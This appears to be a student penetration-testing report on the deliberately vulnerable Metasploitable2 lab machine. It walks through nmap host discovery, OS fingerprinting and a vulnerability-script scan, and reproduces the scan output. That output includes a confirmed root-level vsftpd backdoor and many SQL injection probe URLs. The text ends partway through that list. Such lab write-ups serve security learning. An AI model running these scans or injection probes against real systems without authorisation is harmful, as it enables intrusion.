Vulnerability Assessment & Penetration Testing Report on Metasploitable2
Vapt or Vulnerability Assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, application and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
Penetration testing (or pentesting) is a simulated cyber attack where professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.
It's like in the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It’s a simulated cyber attack where the pentester or ethical hacker uses the tools and techniques available to malicious hackers.
Life Cycle of Penetration Testing:
1] Reconnaissance
2] Scanning
3] Exploitation
4] Maintaining Access
First, we denotes the work of information gathering before any real attacks are planned (like Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But here we have a know target, a Metasploitable2 machine connected to same network as on us to find the target machine we will run an Nmap scan
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
Here, as you can see above the command line and this is IP range that i writter there because we want to know OS details of every system connected to the network so that we can find our target machine. So first we need to sapearate out the live IP address (livehosts.txt) so we save the above result in a text file and then filter the IP address using the command.
and then see the below comand cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt.
Here, We have filtered the file as well as saved the output in a new file and finally our result is in front of you.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat ip.txt
192.168.43.1
192.168.43.120
192.168.43.152
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
Now what we are doing now!! so, now we have to check which one of them is a metasploitable2 machine so we will run an script which will detect the OS of all the live IP's
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt livehosts.txt osdetails.txt vapt-report.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
Our output is here :-)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat osdetails.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Network Distance: 1 hop
Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login
514/tcp open shell?
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
SF:ulJaiswal\)\n");
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP fingerprint, Host, OS details, MAC address, Network distance etc.
Vulnerability Scanning
In this scanning part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerabilities in the system.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
The output is here -
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat vuln.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_sslv2-drown:
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
| ANONYMOUS DH GROUP 1
| Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.ietf.org/rfc/rfc2246.txt
|
| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
| State: VULNERABLE
| IDs: BID:74733 CVE:CVE-2015-4000
| The Transport Layer Security (TLS) protocol contains a flaw that is
| triggered when handling Diffie-Hellman key exchanges defined with
| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
| to downgrade the security of a TLS session to 512-bit export-grade
| cryptography, which is significantly weaker, allowing the attacker
| to more easily break the encryption and monitor or tamper with
| the encrypted stream.
| Disclosure date: 2015-5-19
| Check results:
| EXPORT-GRADE DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 512
| Generator Length: 8
| Public Key Length: 512
| References:
| https://www.securityfocus.com/bid/74733
| https://weakdh.org
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: postfix builtin
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
53/tcp open domain
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.43.120:80/dvwa/
| Form id:
| Form action: login.php
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/edit/TWiki/
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
|
| Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
| Form id: id-bad-cred-tr
| Form action: index.php?page=register.php
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
| Form id: iddnslookupform
| Form action: index.php?page=dns-lookup.php
|
| Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
| Form id: idpollform
|_ Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /tikiwiki/: Tikiwiki
| /test/: Test page
| /phpinfo.php: Possible information file
| /phpMyAdmin/: phpMyAdmin
| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
| /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
| /icons/: Potentially interesting folder w/ directory listing
|_ /index/: Potentially interesting folder
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider¶m1=1.10
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
| http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider¶m1=1.10
| http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
| http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
